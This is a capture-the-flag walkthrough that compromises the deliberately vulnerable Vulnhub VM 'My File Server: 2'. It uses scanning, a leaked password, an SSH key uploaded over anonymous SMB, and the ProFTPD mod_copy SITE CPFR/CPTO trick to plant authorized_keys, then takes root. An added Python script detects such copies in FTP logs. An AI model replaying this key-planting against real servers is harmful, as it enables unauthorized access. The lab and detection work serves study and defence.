My File Server: 2 Walkthrough Vulnhub | My File Server: 2 Vulnhub Writeup
In this article we solve another Vulnhub CTF, My File Server: 2, created by Akanksha Sachin Verma. You can download the VM here.
This boot2root machine is the second challenge of the “My File Server” series. This is a realistic file server with some interesting loopholes. As its name suggests, you will get many file sharing services and their privileges to play with.
We always start with netdiscover to get the IP of the VM.
Let’s proceed further with Nmap to scan our target IP to find open ports and services.
nmap -sV 192.168.43.95
The Nmap output shows that many ports are open on the target, running different services. FTP anonymous login is enabled, and port 445 is also available for SMB.
We also opened the host in a web browser, since port 80 is open for the HTTP service.
I chose to run nikto to list weak HTTP configuration, and luckily found an entry for readme.txt, then opened the file using the curl command.
nikto --url http://192.168.43.95
After running the curl command, the output gave me a password, rootroot1, but when I tried to log in to the SSH account we got a public-key permission denied error. Now it was time to generate some SSH keys, so we used ssh-keygen to generate an SSH key pair without a passphrase on our local machine.
ssh [email protected]
ssh-keygen -b 2048
After generating the SSH key pair, we need to upload the public key to the target machine.
smbclient -L 192.168.43.95
I logged in to the SMB server as the anonymous user and uploaded the public key to the smbdata share as authorized_keys using the following commands.
smbclient //192.168.43.95/smbdata
cd samba/
put /root/.ssh/id_rsa.pub authorized_keys
As the Nmap output already showed, port 2121 on the target is open and running ProFTPD 1.3.5, for which I found the mod_copy exploit.
searchsploit proftpd 1.3.5
I connected to port 2121 and copied our public SSH key from smbdata to the smbuser .ssh directory as authorized_keys.
nc -vv 192.168.43.95 2121
site cpfr /smbdata/samba/authorized_keys
site cpto /home/smbuser/.ssh/authorized_keys
Then I tried again to connect over SSH without a password, and we successfully logged in as smbuser.
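For the defending side, the SITE CPFR / SITE CPTO pair used above is easy to spot in FTP command logs. The following is an added example, not part of the original walkthrough: the log layout, the sample lines and the SENSITIVE path list are constructed assumptions, and real ProFTPD log layouts depend on the server's logging configuration.

```python
import posixpath
import re

# Constructed sample: "<session-id> <client-ip> <raw FTP command>" per line.
# This layout is an assumption; adapt LINE to the server's real log format.
SAMPLE_LOG = """\
s1 192.168.43.10 USER anonymous
s1 192.168.43.10 SITE CPFR /smbdata/samba/authorized_keys
s2 192.168.43.20 SITE CPFR /pub/report.pdf
s1 192.168.43.10 SITE CPTO /home/smbuser/.ssh/authorized_keys
s2 192.168.43.20 SITE CPTO /pub/archive/report.pdf
s3 192.168.43.30 SITE CPTO /etc/cron.d/job
"""

LINE = re.compile(r"^(\S+)\s+(\S+)\s+SITE\s+(CPFR|CPTO)\s+(.+)$", re.IGNORECASE)

# Destinations where a server-side copy leads to account takeover or code
# execution. Assumed list for illustration; extend it for your own hosts.
SENSITIVE = re.compile(r"/\.ssh/|^/etc/|/var/www/|\.php$")


def find_copy_abuse(log_text):
    """Pair each SITE CPTO with the last SITE CPFR of the same session and
    return the copies whose normalized destination matches SENSITIVE."""
    pending = {}  # session id -> source path from the most recent CPFR
    alerts = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # not a mod_copy command
        session, client, verb, path = m.groups()
        path = posixpath.normpath(path.strip())  # collapse "./" and "../"
        if verb.upper() == "CPFR":
            pending[session] = path
            continue
        src = pending.pop(session, None)  # None: CPTO seen without a CPFR
        if SENSITIVE.search(path):
            alerts.append({"session": session, "client": client,
                           "src": src, "dst": path})
    return alerts


if __name__ == "__main__":
    for alert in find_copy_abuse(SAMPLE_LOG):
        print(alert)
```

Sessions are tracked separately, so interleaved clients do not get their source and destination paths mixed up.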
ssh [email protected]192.168.43.95
I escalated to root using the rootroot1 password we already found in the readme.txt file on the Apache server.
id
su root
And finally we found our last flag.
id
cd /root
ls
cat proof.txt